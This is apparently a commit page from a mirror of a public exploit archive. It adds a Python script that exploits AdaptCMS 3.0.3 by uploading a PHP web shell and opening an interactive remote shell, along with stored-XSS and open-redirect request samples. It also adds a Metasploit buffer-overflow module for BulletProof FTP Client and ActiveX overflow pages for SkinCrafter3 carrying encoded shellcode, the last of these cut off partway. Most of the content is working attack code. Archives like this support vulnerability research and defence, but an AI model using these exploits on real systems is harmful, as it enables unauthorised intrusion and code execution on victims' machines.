bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-08

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2015-01-08 08:36:49 +00:00
parent c263b4d439
commit aca838b342
5 changed files with 710 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -32119,7 +32119,7 @@ id,file,description,date,author,platform,type,port
35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0
35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0
35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Include and Cross-Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Include and Cross-Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0
35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0
35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0
35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0
35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
@ -32155,6 +32155,7 @@ id,file,description,date,author,platform,type,port
35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0
35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0
35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0
35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0
35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0
35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0 35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0
35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
@ -32168,3 +32169,5 @@ id,file,description,date,author,platform,type,port
35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0
35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80
35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0

Can't render this file because it is too large.

436
platforms/php/webapps/35710.py Executable file
View file

@ -0,0 +1,436 @@
#!/usr/bin/env python
#
#
# AdaptCMS 3.0.3 Remote Command Execution Exploit
#
#
# Vendor: Insane Visions
# Product web page: http://www.adaptcms.com
# Affected version: 3.0.3
#
# Summary: AdaptCMS is a Content Management System trying
# to be both simple and easy to use, as well as very agile
# and extendable. Not only so we can easily create Plugins
# or additions, but so other developers can get involved.
# Using CakePHP we are able to achieve this with a built-in
# plugin system and MVC setup, allowing us to focus on the
# details and end-users to focus on building their website
# to look and feel great.
#
# Desc: AdaptCMS suffers from an authenticated arbitrary
# command execution vulnerability. The issue is caused due
# to the improper verification of uploaded files. This can
# be exploited to execute arbitrary PHP code by creating
# or uploading a malicious PHP script file that will be
# stored in '\app\webroot\uploads' directory.
#
# Tested on: Apache 2.4.10 (Win32)
# PHP 5.6.3
# MySQL 5.6.21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5220
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5220.php
#
#
# 29.12.2014
#
#
import itertools, mimetools, mimetypes, os
import cookielib, urllib, urllib2, sys, re
from cStringIO import StringIO
from urllib2 import URLError
piton = os.path.basename(sys.argv[0])
def bannerche():
print """
o==========================================o
| |
| AdaptCMS RCE Exploit |
| |
| ID:ZSL-2015-5220 |
| o/ |
+------------------------------------------+
"""
if len(sys.argv) < 3:
print '\x20\x20[*] Usage: '+piton+' <hostname> <pathname>'
print '\x20\x20[*] Example: '+piton+' zeroscience.mk adaptcms\n'
sys.exit()
bannerche()
host = sys.argv[1]
path = sys.argv[2]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
gettokens = opener.open('http://'+host+'/'+path+'/login')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print 'Path error.'
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print 'Hostname error.'
sys.exit()
print '\x20\x20[*] Login please.'
tokenfields = re.search('fields]" value="(.+?)" id=', gettokens.read()).group(1)
gettokens = opener.open('http://'+host+'/'+path+'/login')
tokenkey = re.search('key]" value="(.+?)" id=', gettokens.read()).group(1)
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'_method' : 'POST',
'data[User][username]' : username,
'data[User][password]' : password,
'data[_Token][fields]' : '864206fbf949830ca94401a65660278ae7d065b3%3A',
'data[_Token][key]' : tokenkey,
'data[_Token][unlocked]' : ''
})
login = opener.open('http://'+host+'/'+path+'/login', login_data)
auth = login.read()
for session in cj:
sessid = session.name
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Accessing...'
upload = opener.open('http://'+host+'/'+path+'/admin/files/add')
filetoken = re.search('key]" value="(.+?)" id=', upload.read()).group(1)
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('_method', 'POST')
form.add_field('data[_Token][key]', filetoken)
form.add_field('data[File][type]', 'edit')
form.add_field('data[0][File][filename]', '')
form.add_field('data[0][File][dir]', 'uploads/')
form.add_field('data[0][File][mimetype]', '')
form.add_field('data[0][File][filesize]', '')
form.add_field('data[File][content]', '<?php echo "<pre>"; passthru($_GET[\'cmd\']); echo "</pre>"; ?>')
form.add_field('data[File][file_extension]', 'php')
form.add_field('data[File][file_name]', 'thricer')
form.add_field('data[File][caption]', 'THESHELL')
form.add_field('data[File][dir]', 'uploads/')
form.add_field('data[0][File][caption]', '')
form.add_field('data[0][File][watermark]', '0')
form.add_field('data[0][File][zoom]', 'C')
form.add_field('data[File][resize_width]', '')
form.add_field('data[File][resize_height]', '')
form.add_field('data[0][File][random_filename]', '0')
form.add_field('data[File][library]', '')
form.add_field('data[_Token][fields]', '0e50b5f22866de5e6f3b959ace9768ea7a63ff3c%3A0.File.dir%7C0.File.filesize%7C0.File.mimetype%7CFile.dir')
form.add_file('data[0][File][filename]', 'filename', fileHandle=StringIO(''))
request = urllib2.Request('http://'+host+'/'+path+'/admin/files/add')
request.add_header('User-agent', 'joxypoxy 6.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
f_loc = '/uploads/thricer.php'
print
while True:
try:
cmd = raw_input('shell@'+host+':~# ')
execute = opener.open('http://'+host+'/'+path+f_loc+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print
if cmd.strip() == 'exit':
break
except Exception:
break
print 'Session terminated.\n'
sys.exit()
"""
###############################################################################
AdaptCMS 3.0.3 Multiple Persistent XSS Vulnerabilities
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
Desc: AdaptCMS version 3.0.3 suffers from multiple stored
cross-site scripting vulnerabilities. Input passed to several
POST parameters is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an
affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5218
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5218.php
29.12.2014
--
==========================================
#1 Stored XSS
POST parameter: data[Category][title]
------------------------------------------
POST /adaptcms/admin/categories/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/categories/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
_method=POST&data%5B_Token%5D%5Bkey%5D=851f8e2e973800b2b0635d5157c55369bcade604&data%5BCategory%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&data%5B_Token%5D%5Bfields%5D=14d1551ece2201712436bf482f7e776f422a7966%253A&data%5B_Token%5D%5Bunlocked%5D=
=======================================
#2 Stored XSS
POST parameter: data[Field][title]
---------------------------------------
POST /adaptcms/admin/fields/ajax_fields/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/adaptcms/admin/fields/add
Content-Length: 141
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
data%5BField%5D%5Bcategory_id%5D=2&data%5BField%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&data%5BField%5D%5Bdescription%5D=
=========================
#3 Stored XSS
POST parameter: name
-------------------------
POST /adaptcms/admin/tools/create_theme?finish=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://localhost/adaptcms/admin/tools/create_theme
Content-Length: 242
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"basicInfo":{"name":"\"><script>alert(3);</script>","block_active":"","is_fields":"","is_searchable":""},"versions":{"current_version":"1.0","versions":["1.0","111"]},"skeleton":{"controller":false,"model":false,"layout":true,"views":false}}
===========================================
#4 Stored XSS
POST parameter: data[Link][link_title]
-------------------------------------------
POST /adaptcms/admin/links/links/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/links/links/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
_method=POST&data%5B_Token%5D%5Bkey%5D=2c5e2f46b5c13a78395b2e79303543cd4d444789&data%5BLink%5D%5Btitle%5D=444&data%5BLink%5D%5Burl%5D=http%3A%2F%2Fzeroscience.mk&data%5BLink%5D%5Blink_title%5D="><script>alert(4);</script>&data%5BLink%5D%5Blink_target%5D=_new&data%5BLink%5D%5Bactive%5D=0&data%5BLink%5D%5Bactive%5D=1&data%5BLink%5D%5Btype%5D=&data%5BLink%5D%5Bimage_url%5D=&data%5BLink%5D%5Bselect_all%5D=0&data%5BLink%5D%5Bselect_none%5D=0&data%5BLink%5D%5Bsort_by%5D=&data%5BLink%5D%5Bsort_direction%5D=&data%5B_Token%5D%5Bfields%5D=34394f00acd7233477b8cd9e681e331f083052a5%253A&data%5B_Token%5D%5Bunlocked%5D=
==============================================
#5 Stored XSS
POST parameter: data[ForumTopic][subject]
----------------------------------------------
POST /adaptcms/forums/off-topic/new HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/forums/off-topic/new
Cookie: adaptcms=c4fqklpt7gneokqbbv4iq1e5b1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
_method=POST&data%5B_Token%5D%5Bkey%5D=4c5428572b6454152377ae8db2c3a8a753f39dba&data%5BForumTopic%5D%5Bsubject%5D=%22%3E%3Cscript%3Ealert%285%29%3B%3C%2Fscript%3E&data%5BForumTopic%5D%5Bcontent%5D=%3Cp%3Etestingcontent%3C%2Fp%3E&data%5BForumTopic%5D%5Btopic_type%5D=topic&data%5BForumTopic%5D%5Bforum_id%5D=1&data%5B_Token%5D%5Bfields%5D=bcff03f6432e544b05d877fcdd8c29f13155693a%253AForumTopic.forum_id%257CForumTopic.topic_type&data%5B_Token%5D%5Bunlocked%5D=
###############################################################################
AdaptCMS 3.0.3 HTTP Referer Header Field Open Redirect Vulnerability
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
Desc: Input passed via the 'Referer' header field is not
properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary
website e.g. when a user clicks a specially crafted link
to the affected script hosted on a trusted domain.
====================================
\lib\Cake\Controller\Controller.php:
------------------------------------
Line: 956
..
..
Line: 974
------------------------------------
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5219
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5219.php
29.12.2014
--
GET /adaptcms/admin/adaptbb/webroot/foo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Referer: http://zeroscience.mk
"""

91
platforms/windows/local/35712.rb Executable file
View file

@ -0,0 +1,91 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'BulletProof FTP Client BPS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan'
],
'References' =>
[
[ 'EDB', '34162' ],
[ 'EDB', '34540' ],
[ 'EDB', '35449' ],
[ 'OSVDB', '109547' ],
[ 'CVE', '2014-2973' ],
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x1a",
'Space' => 2000
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'Offset' => 89,
'Ret' => 0x74c86a98 # POP EDI # POP ESI # RET [oleacc.dll]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 24 2014',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
],
self.class)
end
def exploit
eggoptions = {
:checksum => true,
:eggtag => 'w00t'
}
hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
sploit << rand_text_alpha(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << hunter + "\r\n" # FTP Server HOST / IP
sploit << rand_text_numeric(5) + "\r\n" # Port number
sploit << egg + "\r\n" # Login name
sploit << rand_text_alpha(8) + "\r\n" # Login password
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(sploit)
end
end

4
platforms/windows/remote/35652.sh
View file

@ -1,11 +1,11 @@
#!/bin/sh #!/bin/sh
# Exploit title: Liferay Portal 7.0 RCE # Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE
# Date: 11/16/2014 # Date: 11/16/2014
# Exploit author: drone (@dronesec) # Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/ # Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip # Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0/7.0.1/7.0.2 # Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3
# Fixed in: 7.0.3 # Fixed in: 7.0.3
# Tested on: Windows 7 # Tested on: Windows 7

177
platforms/windows/remote/35694.txt Executable file
View file

@ -0,0 +1,177 @@
<html>
<br>ActiveX Buffer Overflow in SkinCrafter3_vs2005 </br>
<br>Affected version=3.8.1.0</br>
<br>Vendor Homepage:http://skincrafter.com/</br>
<br>Software Link:skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter3_vs2005.dll.</br>
<br>Description: Skin Crafter is a software that is used to create custom skins for different windows applications.</br>
<br>SkinCrafter is compatible with Windows XP / Vista / 7 / 8 and earlier versions.</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<br>Vulnerability discovered:04.01.2015</br>
<!--
POC Video:http://bit.ly/1vNKL9M
twitter.com/m3tac0m
-->
<object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 1084) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xCD\xC6\x03\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 8916) junk2+="D";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="SkinCrafter3_vs2005";
arg3="SkinCrafter3_vs2005";
arg4="SkinCrafter3_vs2005";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 );
</script>
</html>
################################################################################
<html>
<br>ActiveX Buffer Overflow in SkinCrafter3_vs2010 </br>
<br>Affected version=3.8.1.0</br>
<br>Vendor Homepage:http://skincrafter.com/</br>
<br>Software Link:skincrafter.com/downloads/SkinCrafter_Demo_2010_2012_x86.zip</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter3_vs2010.dll.</br>
<br>Description: Skin Crafter is a software that is used to create custom skins for different windows applications.</br>
<br>SkinCrafter is compatible with Windows XP / Vista / 7 / 8 and earlier versions.</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<br>Vulnerability discovered:04.01.2015</br>
<!--
POC Video:http://bit.ly/1Bx9BQ0
twitter.com/m3tac0m
-->
<object classid='clsid:F67E9E3C-B156-4B86-BD11-8301E639541E' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2052) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xA3\x6C\x01\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
